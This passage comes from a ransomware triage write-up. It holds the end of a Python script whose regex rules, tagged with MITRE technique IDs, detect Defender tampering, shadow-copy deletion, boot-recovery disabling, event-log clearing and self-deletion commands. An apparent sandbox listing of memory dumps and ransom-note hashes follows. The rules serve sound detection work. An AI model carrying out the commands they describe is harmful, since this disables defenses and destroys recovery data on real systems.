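    ("service start disabled",       "T1489",     r"^sc(\.exe)?\s+config\b.*\bstart=\s*disabled"),
    ("Defender policy key changed",  "T1562.001", r'^reg(\.exe)?\s+(add|delete)\s+"HKLM\\Software\\Policies\\Microsoft\\Windows Defender'),
    ("Defender service disabled",    "T1562.001", r'^reg(\.exe)?\s+add\s+"HKLM\\System\\CurrentControlSet\\Services\\(WinDefend|WdBoot|WdFilter|WdNisDrv|WdNisSvc|SecurityHealthService)"\s+/v\s+"Start"\s+/t\s+REG_DWORD\s+/d\s+"4"'),
    ("Defender task disabled",       "T1562.001", r'^schtasks(\.exe)?\s+/Change\s+/TN\s+"Microsoft\\Windows\\(Windows Defender|ExploitGuard)\\[^"]*"\s+/Disable'),
    ("Defender definitions removed", "T1562.001", r'MpCmdRun\.exe"?\s+-RemoveDefinitions'),
    ("Defender preference disabled", "T1562.001", r"Set-MpPreference\s+-Disable\w+\s+\$true"),
    ("shadow copies deleted",        "T1490",     r"^(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)"),
    ("boot recovery disabled",       "T1490",     r"^bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    ("event log cleared",            "T1070.001", r"^wevtutil(\.exe)?\s+cl\s+\S+"),
    ("self-deletion after ping",     "T1070.004", r"ping(\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\s*&&\s*del\b"),
    ("ransom note opened",           "n/a",       r"^notepad(\.exe)?\s+.*HOW_TO_DECRYPT"),
]
COMPILED = [(label, tech, re.compile(rx, re.IGNORECASE)) for label, tech, rx in RULES]

# Stages that together mark the ransomware pre-encryption chain.
CHAIN = {"T1489", "T1490", "T1562.001"}


def classify(cmdline):
    """Return every (label, technique) pair whose rule matches this command line."""
    return [(label, tech) for label, tech, rx in COMPILED if rx.search(cmdline)]


def triage(cmdlines):
    """Summarise a batch of command lines: techniques seen, labels per technique,
    lines no rule matched, and a verdict on whether the full chain is present."""
    labels = {}
    unmatched = []
    for c in cmdlines:
        hits = classify(c)
        if not hits:
            unmatched.append(c)
        for label, tech in hits:
            labels.setdefault(tech, set()).add(label)
    techniques = sorted(t for t in labels if t != "n/a")
    verdict = ("service stop + impair defenses + inhibit recovery chain present"
               if CHAIN <= set(techniques) else "isolated indicators only")
    return {
        "techniques": techniques,
        "labels": {t: sorted(v) for t, v in labels.items()},
        "unmatched": unmatched,
        "verdict": verdict,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINES)
    for tech in result["techniques"]:
        print(tech, "->", ", ".join(result["labels"][tech]))
    print("unmatched:", result["unmatched"])
    print("verdict:", result["verdict"])
```

The rules are deliberately anchored on the tool name and the exact switches seen here, so a lone `sc config` or a scheduled-task change does not fire by itself; the verdict comes from the co-occurrence of the three stages, which is the signal worth alerting on. The `wmic.exe SHADOWCOPY /nointeractive` entry above opens an interactive WMIC session and carries no verb, so it is intentionally left to the `shadowcopy delete` rule that follows it.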

Network

N/A

Files

memory/1348-54-0x0000000000000000-mapping.dmp

memory/580-55-0x0000000000000000-mapping.dmp

memory/1160-56-0x0000000000000000-mapping.dmp

memory/1568-57-0x0000000000000000-mapping.dmp

memory/560-58-0x0000000000000000-mapping.dmp

memory/824-59-0x0000000000000000-mapping.dmp

memory/1516-60-0x0000000000000000-mapping.dmp

memory/1300-61-0x0000000000000000-mapping.dmp

memory/1988-62-0x0000000000000000-mapping.dmp

memory/1032-63-0x0000000000000000-mapping.dmp

memory/1712-64-0x0000000000000000-mapping.dmp

memory/1144-65-0x0000000000000000-mapping.dmp

memory/2028-66-0x0000000000000000-mapping.dmp

memory/1692-67-0x0000000000000000-mapping.dmp

memory/1420-68-0x0000000000000000-mapping.dmp

memory/1008-69-0x0000000000000000-mapping.dmp

memory/1656-70-0x0000000000000000-mapping.dmp

memory/1304-71-0x0000000000000000-mapping.dmp

memory/1968-72-0x0000000000000000-mapping.dmp

memory/1952-73-0x0000000000000000-mapping.dmp

memory/636-74-0x0000000000000000-mapping.dmp

memory/896-75-0x0000000000000000-mapping.dmp

memory/1664-76-0x0000000000000000-mapping.dmp

memory/1688-77-0x0000000000000000-mapping.dmp

memory/1284-78-0x0000000000000000-mapping.dmp

memory/1636-79-0x0000000000000000-mapping.dmp

memory/584-80-0x0000000000000000-mapping.dmp

memory/548-81-0x0000000000000000-mapping.dmp

memory/1384-82-0x0000000000000000-mapping.dmp

memory/1824-83-0x0000000000000000-mapping.dmp

memory/1300-84-0x0000000000000000-mapping.dmp

memory/1028-85-0x0000000000000000-mapping.dmp

memory/1120-86-0x0000000000000000-mapping.dmp

memory/860-87-0x0000000000000000-mapping.dmp

memory/848-88-0x0000000000000000-mapping.dmp

memory/1452-89-0x0000000000000000-mapping.dmp

memory/1484-90-0x0000000000000000-mapping.dmp

memory/2040-91-0x0000000000000000-mapping.dmp

memory/684-92-0x0000000000000000-mapping.dmp

memory/1064-93-0x0000000000000000-mapping.dmp

memory/1708-94-0x0000000000000000-mapping.dmp

memory/1280-95-0x0000000000000000-mapping.dmp

memory/1556-96-0x0000000000000000-mapping.dmp

memory/368-97-0x0000000000000000-mapping.dmp

memory/1588-98-0x0000000000000000-mapping.dmp

memory/284-99-0x0000000000000000-mapping.dmp

memory/1056-100-0x0000000000000000-mapping.dmp

memory/1936-101-0x0000000000000000-mapping.dmp

memory/1356-102-0x0000000000000000-mapping.dmp

memory/1956-103-0x0000000000000000-mapping.dmp

memory/1644-104-0x0000000000000000-mapping.dmp

memory/1576-105-0x0000000000000000-mapping.dmp

memory/1168-106-0x0000000000000000-mapping.dmp

memory/1552-107-0x0000000000000000-mapping.dmp

memory/520-108-0x0000000000000000-mapping.dmp

memory/1820-109-0x0000000000000000-mapping.dmp

memory/828-110-0x0000000000000000-mapping.dmp

memory/1052-111-0x0000000000000000-mapping.dmp

memory/1800-112-0x0000000000000000-mapping.dmp

memory/1800-113-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp

memory/904-114-0x0000000000000000-mapping.dmp

memory/572-116-0x0000000000000000-mapping.dmp

memory/1832-118-0x0000000000000000-mapping.dmp

memory/1792-119-0x0000000000000000-mapping.dmp

memory/1724-120-0x0000000000000000-mapping.dmp

memory/108-122-0x000007FEF2CD0000-0x000007FEF382D000-memory.dmp

memory/108-123-0x00000000023D0000-0x00000000023D2000-memory.dmp

memory/108-125-0x00000000023D4000-0x00000000023D7000-memory.dmp

memory/108-124-0x00000000023D2000-0x00000000023D4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 02c407da2f40abf4360451a9267406bb
SHA1 df883e6533a6e78ef1ce8017299d5403375917e7
SHA256 21d8e477dd0abe67dfd55baa0759492f5164b113c8c1151d69ddc791ed2f4475
SHA512 eeebd3cbb4435c458ff046d23961f712c84ebb1fd7f624ce938f5da3001dbe411dbe1a3981770f0b487dc53cca24418c1a7c451d1df96429edbf1954fef8e79e

memory/108-127-0x00000000023DB000-0x00000000023FA000-memory.dmp

memory/2096-129-0x000007FEF2330000-0x000007FEF2E8D000-memory.dmp

memory/2096-130-0x0000000002820000-0x0000000002822000-memory.dmp

memory/2096-131-0x0000000002822000-0x0000000002824000-memory.dmp

memory/2096-132-0x0000000002824000-0x0000000002827000-memory.dmp

memory/2096-133-0x000000000282B000-0x000000000284A000-memory.dmp

C:\wbzc_HOW_TO_DECRYPT.txt

MD5 94140f86ecb9d062265eac7b7795646a
SHA1 3db5ede5d02c592e82133318f404592b4b547288
SHA256 542850d1bc9b7db0628229dd0fcf63deea399a04ab395f02261a76fd6a29ab60
SHA512 5a85cb40cc4235080064e09a0f32be259d00cb5308868c76a09dbb596386a17a864b65fca60366eba91a886e422ca45a7441b45a27ca40f564473b6d656da543